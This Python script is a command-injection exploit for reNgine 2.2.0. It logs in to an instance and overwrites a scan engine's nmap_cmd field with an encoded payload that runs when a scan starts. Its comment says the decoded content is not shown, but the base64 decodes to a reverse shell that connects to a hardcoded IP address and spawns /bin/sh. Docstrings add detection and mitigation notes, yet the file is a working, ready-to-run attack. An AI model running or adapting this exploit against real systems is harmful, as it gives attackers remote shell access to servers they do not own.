import requests
import argparse
import sys

# Shell command string that modify_scan_engine() writes into the target's
# ``nmap_cmd`` field: an ``echo`` of a base64 literal piped through
# ``base64 --decode`` and then into ``/bin/sh``.  The decoded content is
# not shown on this page.  From a detection standpoint, the literal
# ``base64 --decode |/bin/sh`` fragment appearing inside a scan-engine
# configuration field (or in a PATCH body to the scanengine API) is the
# observable artefact of this technique.
payload = "".join(
    (
        'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0',
        'KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAu',
        'MjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihz',
        'LmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4v',
        'c2giKScg"|base64 --decode |/bin/sh',
    )
)

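def login(base_url, username, password):
    """Authenticate against the reNgine login API and return the session cookies.

    The later scan-engine PATCH is sent with these cookies, so the request
    sequence in this script is post-authentication: it needs a valid account
    on the instance.

    Args:
        base_url: Scheme and host of the instance, without a trailing slash
            (``/api/login/`` is appended here).
        username: Account name sent in the JSON body.
        password: Account password sent in the JSON body.

    Returns:
        The ``requests`` cookie jar from the 200 response, forwarded unchanged
        by the caller on subsequent API calls.

    Raises:
        SystemExit: with status 1 when the server answers anything but 200.
        requests.RequestException: on connection failure or timeout; not
            caught here.
    """
    login_url = f"{base_url}/api/login/"
    data = {"username": username, "password": password}
    # Bounded wait: without a timeout a non-responding host hangs the script.
    response = requests.post(login_url, json=data, timeout=30)

    if response.status_code == 200:
        print("[+] Login successful")
        return response.cookies

    print("[-] Login failed")
    print(response.text)
    # Non-zero status: a bare sys.exit() reported success (0) on failure.
    sys.exit(1)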

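def modify_scan_engine(base_url, cookies, scan_engine_id):
    """PATCH one Scan Engine so its ``nmap_cmd`` field holds ``payload``.

    The only authentication is the cookie jar from :func:`login`.  What the
    server does with ``nmap_cmd`` is not visible on this page; the script's
    final message implies the field is consumed when a scan is started.  The
    server-side mitigation is to validate or allow-list this field and never
    hand it to a shell; on the detection side, PATCH requests to
    ``/api/scanengine/<id>/`` whose ``nmap_cmd`` contains shell metacharacters
    or a ``base64 --decode`` pipeline are the signal to alert on.

    Args:
        base_url: Scheme and host of the instance, without a trailing slash.
        cookies: Session cookie jar returned by :func:`login`.
        scan_engine_id: Integer id interpolated into the API path.

    Raises:
        SystemExit: with status 1 when the server answers anything but 200.
        requests.RequestException: on connection failure or timeout; not
            caught here.
    """
    url = f"{base_url}/api/scanengine/{scan_engine_id}/"
    headers = {"Content-Type": "application/json"}
    data = {"nmap_cmd": payload}

    # Bounded wait: without a timeout a non-responding host hangs the script.
    response = requests.patch(
        url, cookies=cookies, json=data, headers=headers, timeout=30
    )

    if response.status_code == 200:
        print("[+] Scan Engine modified successfully")
        return

    print("[-] Failed to modify Scan Engine")
    print(response.text)
    # Non-zero status: a bare sys.exit() reported success (0) on failure.
    sys.exit(1)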

def main():
    """Parse the command line, authenticate, then PATCH the chosen Scan Engine.

    All four options are mandatory; argparse exits with usage text when any is
    missing.  The two API calls each terminate the process themselves on a
    non-200 response, so reaching the final print means both succeeded.
    """
    arg_parser = argparse.ArgumentParser(description="reNgine 2.2.0 Command Injection Exploit")
    arg_parser.add_argument("--url", required=True, help="Base URL of the reNgine instance (e.g., http://rengine.example.com)")
    arg_parser.add_argument("--username", required=True, help="Username for authentication")
    arg_parser.add_argument("--password", required=True, help="Password for authentication")
    arg_parser.add_argument("--engine-id", required=True, type=int, help="ID of the Scan Engine to modify")

    opts = arg_parser.parse_args()

    session_cookies = login(opts.url, opts.username, opts.password)
    modify_scan_engine(opts.url, session_cookies, opts.engine_id)
    print("[+] Payload injected. Start a scan using the modified Scan Engine.")

if __name__ == "__main__":
    # Script entry point; importing the module runs nothing.
    main()